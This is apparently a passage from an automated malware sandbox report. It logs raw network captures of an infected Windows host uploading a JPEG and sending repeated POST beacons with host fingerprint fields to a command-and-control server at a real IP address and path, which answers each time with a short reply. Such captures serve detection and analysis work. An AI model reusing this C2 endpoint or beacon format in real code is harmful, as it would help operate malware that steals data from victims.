                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:26.373028040 CEST12145OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:26.373137951 CEST12148OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:26.373186111 CEST12151OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:26.373589993 CEST12153OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:26.373718023 CEST12156OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:26.374130964 CEST12159OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:26.374383926 CEST12164OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:26.374639034 CEST12167OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:26.374773979 CEST12169OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 23:00:26.466686010 CEST12186OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          481192.168.2.450039176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.411927938 CEST12170OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          482176.111.174.11480192.168.2.450039C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.509175062 CEST12224INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          483192.168.2.450040176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.730499029 CEST12358OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          484176.111.174.11480192.168.2.450038C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.751928091 CEST12359INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          485176.111.174.11480192.168.2.450040C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.835181952 CEST12359INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          486192.168.2.450042176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:27.042220116 CEST12360OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          487176.111.174.11480192.168.2.450042C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:27.144037008 CEST12361INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          488192.168.2.450043176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:27.352741957 CEST12361OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          489176.111.174.11480192.168.2.450043C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:27.456310034 CEST12362INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          49176.111.174.11480192.168.2.449772C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:18.337394953 CEST4545INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          490192.168.2.450044176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:27.908010960 CEST12362OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          491176.111.174.11480192.168.2.450044C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:28.006732941 CEST12363INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          492192.168.2.450046176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:28.212729931 CEST12363OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          493176.111.174.11480192.168.2.450046C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:28.314824104 CEST12364INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          494192.168.2.450047176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:28.883387089 CEST12364OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          495176.111.174.11480192.168.2.450047C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:28.985466003 CEST12365INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          496192.168.2.450048176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:29.225320101 CEST12365OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
